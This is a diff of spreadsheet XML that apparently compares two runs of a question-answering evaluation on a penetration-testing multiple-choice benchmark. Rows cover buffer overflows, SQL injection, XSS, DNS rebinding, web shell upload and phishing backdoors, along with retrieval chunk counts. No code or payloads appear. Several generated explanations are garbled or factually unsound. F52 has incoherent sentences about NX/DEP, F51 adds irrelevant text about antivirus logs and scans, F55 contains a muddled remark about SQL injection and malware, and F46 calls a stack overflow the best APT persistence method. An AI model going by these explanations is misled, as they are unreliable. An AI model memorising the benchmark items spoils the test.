         <is>
@@ -3345,7 +3134,7 @@
       <c r="F44" t="inlineStr">
         <is>
           <t>Answer: Executing actions on objectives that align with the authorized goals of the penetration test
-Explanation: In the context of a penetration test, once a vulnerability is exploited, the expected and permissible action is to execute tasks that align with the predefined objectives stated in the rules of engagement. This often involves proving potential damage or impact through 'actions on objectives' which might include accessing and retrieving sensitive data, modifying database records, etc., as authorized. The first option, simply reporting the vulnerabilities, would typically follow after these actions are completed, not as a direct result of exploiting the vulnerability.</t>
+Explanation: In the context of a penetration test, once a vulnerability is exploited, the expected and permissible action is to execute tasks that align with the predefined objectives stated in the rules of engagement. This often involves proving potential damage or impact through 'actions on objectives' which might include accessing and retrieving sensitive data, modifying database records, etc., as authorized. The first option, simply reporting the vulnerabilities, would typically follow after these actions are completed, not as a direct response to exploiting a vulnerability. Deploying a temporary patch is generally the responsibility of the organization being tested, not the penetration tester.</t>
         </is>
       </c>
       <c r="G44" t="inlineStr">
@@ -3359,21 +3148,16 @@
 preemware_pentestingeval.pdf (Chunk: 7ea14143-5006-4460-8551-02e670eeceb2, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I44" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J44" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K44" t="inlineStr">
         <is>
@@ -3412,7 +3196,7 @@
       <c r="F45" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow
-Explanation: A buffer overflow occurs when data written to a buffer also corrupts data values in memory addresses adjacent to the destination buffer due to insufficient bounds checking. This can potentially allow an attacker to execute arbitrary code by carefully crafting the overflow with specific payloads that overwrite certain memory locations, thereby facilitating arbitrary code execution in the context of a software application. Heap spraying, SQL injection, and Cross-site scripting are other exploitation techniques but they do not primarily involve manipulating memory corruption errors for arbitrary code execution.</t>
+Explanation: A buffer overflow occurs when data written to a buffer also corrupts data values in memory addresses adjacent to the destination buffer due to insufficient bounds checking. This can potentially allow an attacker to execute arbitrary code by carefully crafting the overflow with specific payloads that overwrite certain memory locations, such as the return address of a function or the instruction pointer, to redirect the execution flow to malicious code. Heap spraying, SQL injection, and cross-site scripting are other exploitation techniques but do not primarily focus on manipulating memory corruption errors for arbitrary code execution in software applications.</t>
         </is>
       </c>
       <c r="G45" t="inlineStr">
@@ -3426,21 +3210,16 @@
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I45" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J45" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K45" t="inlineStr">
         <is>
@@ -3479,7 +3258,7 @@
       <c r="F46" t="inlineStr">
         <is>
           <t>Answer: Using a buffer overflow to trigger a stack-based execution
-Explanation: In the context of an advanced persistent threat (APT), the most effective method for maintaining long-term access to a target network without immediate detection is using a buffer overflow to trigger a stack-based execution. This technique exploits memory corruption errors to run arbitrary code directly within the context of the application, which can be crafted to create backdoors or rootkits, thereby providing persistent and stealthy access. While weak password policies and brute-force tactics can lead to initial access, they are not as effective for maintaining long-term access without detection. ARP spoofing attacks and man-in-the-middle attacks via compromised SSL certificates can intercept network traffic but do not inherently provide persistent host access or bypass detection mechanisms.</t>
+Explanation: In the context of an advanced persistent threat (APT), the goal is to maintain prolonged, stealthy access to a target network to gather or manipulate sensitive information. Among the listed options, 'Using a buffer overflow to trigger a stack-based execution' is the best technique for maintaining long-term access. This method exploits memory corruption vulnerabilities in software applications and can be used to execute arbitrary code directly on the host system at a low level. By crafting shellcode or rootkits that take advantage of these vulnerabilities, an attacker can install backdoors that persist undetected through reboots and evade common security measures.</t>
         </is>
       </c>
       <c r="G46" t="inlineStr">
@@ -3493,21 +3272,16 @@
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I46" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J46" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K46" t="inlineStr">
         <is>
@@ -3546,7 +3320,7 @@
       <c r="F47" t="inlineStr">
         <is>
           <t>Answer: DNS Rebinding
-Explanation: DNS Rebinding is a technique that manipulates the domain name system to evade the Same-Origin Policy (SOP), which is used by web browsers to isolate different origins and prevent web pages from accessing resources from other domains. By changing the IP address to which a domain name points after initial trust has been established, an attacker can bypass the same-origin policy and gain access to restricted networks or perform actions as the client within their internal systems.</t>
+Explanation: DNS Rebinding is a technique that manipulates the domain name system to evade the Same-Origin Policy (SOP), which is used by web browsers to isolate different origins and prevent web pages from accessing resources from other domains. By changing the IP address to which a domain name points after initial trust has been established, an attacker can bypass the SOP and gain access to restricted networks or perform actions as the client within their internal systems.</t>
         </is>
       </c>
       <c r="G47" t="inlineStr">
@@ -3560,21 +3334,16 @@
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 4)
-cowWhySo-pentest-redteam-steering.md (Chunk: f9343d42-93a5-4f47-97bb-489ea5cf677a, Type: dense, Rank: 5)
-cowWhySo-pentest-redteam-steering.md (Chunk: fc84618c-065b-4f70-856d-10254a7f3dca, Type: sparse, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 0c2db85c-1eea-4150-9a9e-90b5f035d29f, Type: sparse, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: 7db6aa82-d359-47a7-8351-b29272aba5e5, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e189877f-2ed8-49a5-ae4b-00bb7694f847, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 10)</t>
+cowWhySo-pentest-redteam-steering.md (Chunk: f9343d42-93a5-4f47-97bb-489ea5cf677a, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I47" t="inlineStr">
         <is>
-          <t>Semantic: 5, Keyword: 5, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J47" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K47" t="inlineStr">
         <is>
@@ -3613,7 +3382,7 @@
       <c r="F48" t="inlineStr">
         <is>
           <t>Answer: Performing a phishing attack to install a backdoor on an administrative computer
-Explanation: The correct answer is 'Performing a phishing attack to install a backdoor on an administrative computer' because it provides the adversary with a strategic advantage in maintaining long-term access to the victim's network. Phishing attacks are effective in deceiving users into divulging sensitive information or granting access, which can be used to install backdoors and maintain persistent access without being detected by traditional security measures. While zero-day exploits, weak default configurations on IoT devices, and brute-force attacks against exposed SSH servers can also provide initial access, they may not necessarily lead to long-term access or strategic advantage as effectively as a phishing attack.</t>
+Explanation: The correct answer is 'Performing a phishing attack to install a backdoor on an administrative computer' because it provides the adversary with a strategic advantage in maintaining long-term access to the victim's network. Phishing attacks are highly effective in gaining initial access and can be used to trick administrators into installing malicious software or providing sensitive information. Once the attacker has gained access through a phishing attack, they can install a backdoor that allows them to maintain persistent access without being detected easily. While using a zero-day exploit, exploiting weak default configurations on IoT devices, and conducting a brute-force attack are all valid techniques, they may not necessarily provide the same level of strategic advantage in maintaining long-term access as a phishing attack with backdoor installation.</t>
         </is>
       </c>
       <c r="G48" t="inlineStr">
@@ -3627,21 +3396,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 91760caf-fbdc-4056-8c88-441ac7facf0c, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I48" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J48" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K48" t="inlineStr">
         <is>
@@ -3680,7 +3444,7 @@
       <c r="F49" t="inlineStr">
         <is>
           <t>Answer: Injecting SQL commands to manipulate database server queries
-Explanation: The most effective technique for demonstrating the impact of poor input validation by altering the logic of database queries in a penetration testing scenario is injecting SQL commands to manipulate database server queries. This technique allows an attacker to insert or manipulate SQL commands in user input, leading to unauthorized access to or modification of data. Poor input validation can leave applications vulnerable to SQL injection attacks, which exploit this weakness by allowing an attacker to execute arbitrary code on the database server. The other options do not directly relate to input validation issues affecting database operations: server-side request forgery mainly concerns unauthorized interactions with internal systems through the server, deploying a botnet primarily disrupts service availability rather than exposing data, and cross-site scripting involves executing scripts in a user's browser rather than interacting with database queries.</t>
+Explanation: Injecting SQL commands to manipulate database server queries directly targets the security weakness associated with poor input validation on applications that interact with a database. SQL injection allows an attacker to insert or manipulate SQL commands in user input, leading to unauthorized access to or modification of data. This technique can compromise the entire database system, making it the most effective choice for demonstrating the risks associated with poor input validation in this context. The other options, while also security threats, do not specifically deal with input validation issues affecting database operations: server-side request forgery mainly concerns unauthorized interactions with internal systems through the server, deploying a botnet for DDoS primarily disrupts service availability rather than exposing data, and cross-site scripting involves executing scripts in a user's browser rather than interacting with database queries.</t>
         </is>
       </c>
       <c r="G49" t="inlineStr">
@@ -3694,21 +3458,16 @@
 preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f0173fe8-8eab-43e2-8ab3-d85e378e3eb7, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1bf7372e-dcae-42ee-a9d9-0b1222053518, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 72afb988-5c0b-4173-ac34-2220ef8a72e9, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I49" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J49" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K49" t="inlineStr">
         <is>
@@ -3747,7 +3506,7 @@
       <c r="F50" t="inlineStr">
         <is>
           <t>Answer: SQL Injection
-Explanation: SQL Injection would likely be the primary target in this scenario because this vulnerability is specifically relevant to database manipulation and can allow an attacker to execute malicious SQL statements directly on the database, potentially allowing them to access or modify user data. While Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) are also serious security concerns, they focus more on client-side attacks rather than directly affecting the database logic. Buffer Overflow is not typically associated with web application vulnerabilities involving data handling in a database.</t>
+Explanation: SQL Injection would likely be the primary target in this scenario because this vulnerability allows an attacker to execute malicious SQL statements through user input, potentially allowing them to access or modify sensitive data within the database. Since the web application retains user data directly in a database without proper input sanitization or parameterized queries, it is vulnerable to SQL Injection attacks.</t>
         </is>
       </c>
       <c r="G50" t="inlineStr">
@@ -3761,21 +3520,16 @@
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I50" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J50" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K50" t="inlineStr">
         <is>
@@ -3814,7 +3568,7 @@
       <c r="F51" t="inlineStr">
         <is>
           <t>Answer: Exploiting Cross-site Scripting (XSS) vulnerabilities
-Explanation: Exploiting Cross-site Scripting (XSS) vulnerabilities is the correct answer as XSS attacks involve embedding malicious scripts into web pages viewed by other users, which then allows the attacker to steal cookies, session tokens, or other sensitive information handled by the user's browser. Bypassing Network Access Control (NAC) systems, while relevant for gaining network access, does not directly impact the security of user sessions within a web application. Conducting social engineering attacks is another useful technique in penetration testing but would not directly exploit web application vulnerabilities to compromise user session data. Sending malformed packets to overflow buffer primarily targets vulnerabilities at the network or application layer that result in buffer overflow, which might not be directly useful for compromising processes or artifacts but does not directly reveal data exfiltration paths.</t>
+Explanation: Exploiting Cross-site Scripting (XSS) vulnerabilities is the correct answer as XSS attacks involve embedding malicious scripts into web pages viewed by other users, which then allows the attacker to steal cookies, session tokens, or other sensitive information handled by the user's browser. Bypassing Network Access Control (NAC) systems, while relevant for gaining network access, does not directly impact the security of user sessions within a web application. Conducting social engineering attacks is another useful technique in penetration testing but would not directly exploit web application vulnerabilities to compromise user session data. Sending malformed packets to overflow buffer primarily targets vulnerabilities at the network or application layer that result in buffer overflow, which might not be directly useful for compromising processes or artifacts but does not directly reveal data exfiltration paths. Monitoring antivirus logs is useful for identifying known malware signatures but might not catch new or modified malware that employs unique exfiltration techniques. Conducting external vulnerability scans can help identify system weaknesses but does not provide direct insight into ongoing data exfiltration activities.</t>
         </is>
       </c>
       <c r="G51" t="inlineStr">
@@ -3828,21 +3582,16 @@
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 78887914-a26a-430c-bd9c-f955b8884feb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I51" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J51" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K51" t="inlineStr">
         <is>
@@ -3881,7 +3630,7 @@
       <c r="F52" t="inlineStr">
         <is>
           <t>Answer: Use of a NOP sled to guide execution in a buffer overflow attack
-Explanation: The use of a NOP sled to guide execution in a buffer overflow attack is effective in the context of non-executable stack protections because it helps in redirecting the program's execution flow to injected shellcode, typically placed after the NOP sled in an executable heap or other areas not affected by non-executable stack restrictions. 'Shellcode injection in a non-executable stack segment' is not plausible because modern OS protections such as NX (No Execute) or DEP (Data Execution Prevention) make this boundary and overwrite adjacent memory locations. The most effective and direct way to exploit this type of vulnerability is through 'stack smashing' which involves corrupting the stack of a program. This often includes altering the function's return address stored in the stack to point to a malicious payload's memory location, hence gaining control of the process's flow. The other listed techniques, such as Denial of Service attack via resource exhaustion and Port scan using a TCP FIN packet do not directly apply to exploiting buffer overflows. They target different aspects of system security (e.g., consuming resources or scanning for open ports), thus making these choices incorrect for directly exploiting a buffer overflow vulnerability discovered in a C program.</t>
+Explanation: The use of a NOP sled to guide execution in a buffer overflow attack is effective in the context of non-executable stack protections because it helps in redirecting the program's execution flow to injected shellcode, typically placed after the NOP sled in an executable heap or other areas not affected by non-executable stack restrictions. 'Shellcode injection in a non-executable stack segment' is not plausible because modern OS protections such as NX (No Execute) or DEP (Data Execution Prevention) make this boundary and overwrite adjacent memory locations. The most effective and direct way to exploit this type of vulnerability is through 'stack smashing' which involves corrupting the stack of a program. This often includes altering the function's return address stored in the stack to point to a malicious payload's memory location, hence gaining control of the process's flow. The other listed techniques, such as Denial of Service attack via resource exhaustion and Port scan using a TCP FIN packet do not directly apply to exploiting buffer overflows. They target different aspects of system security (e.g., consuming resources or scanning ports), thus making these choices incorrect for directly exploiting a buffer overflow vulnerability discovered in a C program.</t>
         </is>
       </c>
       <c r="G52" t="inlineStr">
@@ -3895,21 +3644,16 @@
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I52" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J52" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K52" t="inlineStr">
         <is>
@@ -3962,21 +3706,16 @@
 preemware_pentestingeval.pdf (Chunk: bf583f1b-11e6-4ddb-84c3-2719816ab8a0, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 78887914-a26a-430c-bd9c-f955b8884feb, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 00dd62ed-7dfa-4bd3-ad8f-e2b1cba9ce52, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I53" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J53" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K53" t="inlineStr">
         <is>
@@ -4015,7 +3754,7 @@
       <c r="F54" t="inlineStr">
         <is>
           <t>Answer: Shell upload via form manipulation
-Explanation: Shell upload via form manipulation is the most viable method for executing arbitrary code on the server. By manipulating the input forms intended for file upload (for example, a profile picture upload feature), an attacker can upload a web shell, which is a malicious script that can be executed on the server. This allows the attacker to execute server-side commands, potentially taking over the server. SQL Injection via email input primarily targets data extraction or database manipulation, not arbitrary code execution on the server. Cross-site Scripting (XSS) using URL parameters targets the client-side browser rather than the server, primarily allowing the attacker to execute script in the context of a user's browser session. Denial of Service (DoS) attacks rather aim</t>
+Explanation: Shell upload via form manipulation is the most viable method for executing arbitrary code on the server. By manipulating the input forms intended for file upload (for example, a profile picture upload feature), an attacker can upload a web shell, which is a malicious script that can be executed on the server. This allows the attacker to execute server-side commands, potentially taking over the server. SQL Injection via email input primarily targets data extraction or database manipulation, not arbitrary code execution on the server. Cross-site Scripting (XSS) using URL parameters targets the client-side browser rather than the server, primarily allowing the attacker to execute script in the context of a user's browser session. Denial of Service (DoS) through malformed packets aims to disrupt the availability of the server or network, not necessarily allow arbitrary code execution on the server.</t>
         </is>
       </c>
       <c r="G54" t="inlineStr">
@@ -4029,21 +3768,16 @@
 preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: bbbfe90c-f04e-45f2-a571-f5838dfd1b28, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I54" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J54" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K54" t="inlineStr">
         <is>
@@ -4082,7 +3816,7 @@
       <c r="F55" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow
-Explanation: In this scenario, exploiting a buffer overflow vulnerability is the most likely target because this class of vulnerability commonly allows for arbitrary code execution by overflowing the application's buffer, thus overwriting adjacent memory locations, which can include executable code or pointers. Buffer overflow is specifically relevant when handling user inputs that are not properly validated or sanitized, making it a feasible attack vector in the described situation. SQL injection, while dangerous, is more relevant to database techniques typically found in malware.</t>
